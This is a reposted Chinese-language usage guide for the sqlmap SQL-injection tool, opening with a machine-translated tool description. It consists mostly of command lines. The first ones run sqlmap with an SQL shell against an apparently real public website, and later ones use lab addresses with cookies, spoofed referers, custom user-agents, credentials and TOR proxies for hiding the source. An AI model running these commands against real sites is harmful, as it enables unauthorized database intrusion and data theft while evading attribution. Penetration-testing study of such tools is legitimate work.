SQLMAP 注射工具中文使用用法
2024-07-15 01:55:27
供稿:網友
sqlmap 是一個自動SQL 射入工具。它是可勝任執行一個廣泛的數據庫管理系統后端指印, 檢索遙遠的DBMS 數據庫, usernames, 桌, 專欄, 列舉整個DBMS, 讀了系統文件和利用導致SQL 射入弱點的網應用編程的安全漏洞。
有許多其它SQL 射入工具在網, 但我不能發現任何人適合所有我的需要因此我感到需要在我的滲透測試期間給成功地寫我自己的工具測試, 辨認和利用網應用的SQL 射入在安全上的弱點。
sqlmap簡單中文說明
首先下載需要的文件,如果是windows環境直接到http://www.companysz.com/softs/63591.html下載安裝所需要的文件即可。
這個東西,是mickey整理的,不多說了,尊重一下原作者,轉載注明mickey整理就好了
更新
svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
sqlmap.py -u “http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1″ -v 1 –sql-shell //執行SQL語句
sqlmap.py -u “http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1″ -v 5 //更詳細的信息
load options from a configuration INI file
sqlmap -c sqlmap.conf
使用POST方法提交
sqlmap.py -u “http://192.168.1.121/sqlmap/oracle/post_int.php” –method POST –data “id=1″
使用COOKIES方式提交,cookie的值用;分割,可以使用TamperData來抓cookies
python sqlmap.py -u “http://192.168.1.121/sqlmap/mssql/cookie_int.php” –cookie “id=1″ -v 1
使用referer欺騙
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1″ –referer “http://www.google.com” -v 3
使用自定義user-agent,或者使用隨機使用自帶的user-agents.txt
python sqlmap.py -u “http://192.168.1.121/sqlmap/oracle/get_int.php?id=1″ –user-agent “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)” -v 3
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1″ -v 1 -a “./txt/user-agents.txt”
使用基本認證
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/basic/get_int.php?id=1″ –auth-type Basic –auth-cred “testuser:testpass” -v 3
使用Digest認證
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/digest/get_int.php?id=1″ –auth-type Digest –auth-cred “testuser:testpass” -v 3
使用代理,配合TOR
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1″ –proxy “http://192.168.1.47:3128″
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1″ –proxy “http://192.168.1.47:8118″
使用多線程猜解
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1″ -v 1 –current-user –threads 3